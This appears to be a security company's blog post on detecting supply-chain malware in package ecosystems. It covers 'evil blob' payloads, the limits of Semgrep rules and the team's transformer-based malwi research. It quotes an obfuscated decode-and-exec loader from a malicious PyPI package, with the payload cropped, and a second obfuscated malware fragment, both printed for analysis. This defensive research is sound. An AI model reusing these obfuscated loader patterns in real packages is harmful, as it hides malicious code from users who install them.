Hello Evil World

Canvas Computing was born because we noticed that the rise of Supply-Chain attacks has severe consequences on the freedom of how we use and distribute open-source software. Campaigns like the Shai-Hulud npm attacks (2025) demonstrated how simple it is to misuse the trust in open-source software. Many threat actors are following the trend. The more you think about the number of potential attack vectors of a Supply-Chain compromise, the more you realize how difficult it is to protect against them. Given the latest capabilities and scale of agentic coding, those attacks will only increase in complexity and sophistication.

This post gives an introduction into different detection difficulty levels and the research we are applying for detection. The levels are important to categorize research efforts and solutions.

Level 1: Evil Blobs

The simplest form of an exploit is a monolithic block of malicious code inserted directly into a single file, e.g. within a package distributed through npm, pypi, crates etc.

░░░░░░░░░░░░░█████████░░░░░░░░░░░░░░░░ < evil package file
                ^ Malware Blob

One example is a malicious Python package named ForgyPs_2.0.0 which has been identified by security researchers (the full malicious encoded payload was cropped):

import base64 as ______;import marshal as ____;import zlib as __________;from cryptography.fernet import Fernet;import base64;__mikey__="cWY0N2RzQzBhT04wY...05a766a33512d32576d3675";__vare__ = lambda x: ____.loads(__________.decompress(______.b32decode(______.b64decode(x[::-1]))));__mycip__= Fernet(base64.b64decode(__mikey__));__step1__=bytes.fromhex(mydata);__step2__=__mycip__.decrypt(__step1__);__decr__=base64.b64decode(__step2__);__decrdata__=__decr__;__gotnew__=base64.b32decode(__decr__);__newdecr__=79117779391;__getnew__=__newdecr__;__myb64code__=base64.b64decode(__gotnew__);__myb64codee__=base64.b64decode(__myb64code__);___ = __myb64codee__;exec(__vare__(___))

In this case the malware was placed in a random __init__.py file. It contains the whole exploit in one encoded blob.

Detecting Evil Blobs

How can you detect this evil payload? The problem is that most package managers execute code at installation time. So this code is executed already when performing pip install ForgyPs. Be careful when installing untrusted software, even from popular ecosystems.

Many security researchers, use tools like Opengrep or Semgrep and create rules for pattern detection. However this is very brittle. Imagine you are writing a Semgrep rule for the base64.b64decode(...) call in this example:

rules:
  - id: suspicious-base64-decode
    pattern: base64.b64decode(...)
    message: Suspicious use of base64 decoding
    languages: [python]
    severity: WARNING

Either the pattern is too specific and only matches this single example, or too generic and creates many findings in trustworthy packages as well. This is why rule-based systems are not sufficient to identify malware at scale.

Another malware example where rule-based or static code analysis fails is the following:

if sys.platform == ''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [(((1 << 4) - 1) << 3) - 1, ((((3 << 2) + 1)) << 3) + 1, (7 << 4) - (1 << 1), ((((3 << 2) + 1)) << 2) - 1, (((3 << 3) + 1) << 1)])):
	if sys.argv[1] in [''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [(((3 << 3) + 1) << 2) + 1, ((((3 << 2) + 1)) << 3) - 1, ((((3 << 2) + 1)) << 3) - 1, (3 << 5) - 1, ((((3 << 2) + 1)) << 3) + 1, (7 << 4) - (1 << 1), ((((3 << 2) + 1)) << 3) - (1 << 1), (7 << 4) - 1])), ''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [(3 << 5) + (1 << 1), (((1 << 4) - 1) << 3) - 3, ((((3 << 2) + 1)) << 3) + 1, (((7 << 2) - 1) << 2), (((3 << 3) + 1) << 2)]))]:	
		馬女水女口目人馬鳥月水馬山山馬鸟 = 834*(395 & 643)+865//460-(104 | 469+415) | 104 << 313 << 357 >> (935 | 183) & ~61
...

Many modern security vendors apply rule-based tooling in combination with Large Language Models (LLMs) for triaging. LLMs may reduce the problem of false-positives (eventually), but they do not solve the initial detection problem. If your first search query does not point to the right malicious file, your LLM might never see it. Additionally, scanning through all files with LLMs of many packages is very costly. Cheaper models also create worse results, and again produce more false-positives.

This is why we are convinced that deeper research is required, to not lose the trust in distributing software through open-source.

malwi

Our initial research focused on malicious blobs. We stumbled across a promising paper which helped us to create our first research project: malwi is based on the design of Zero Day Malware Detection with Alpha: Fast DBI with Transformer Models for Real World Application (2025). The idea is to compile any code to a byte-code like structure, and then apply a lightweight Transformer-based model like Longformer or DistilBERT for detecting patterns.

The challenge here was to get enough training data and also to sanitize the data properly, to not train on benign code. malwi achieved very good model performance scores (F1: 0.95) based on DistilBERT and even higher scores based on Longformer (F1: 0.99). However we noticed that this research path does not scale well and has limitations.

There are limited datasets available for training a model, and only for a couple of languages. Even if you have a dataset of malicious packages or code, triaging the data turns out to be very difficult:

  • Which parts of the code must be used for training? Which parts can be excluded to not overflow the model context window?
  • Where does a malicious function start, and where does it stop?
  • How do you pre-process the code for training?

Those questions are very difficult to answer. This insight pushed us to continue our research in other areas and different techniques. We also defined another malware category: Level 2: Evil Shards.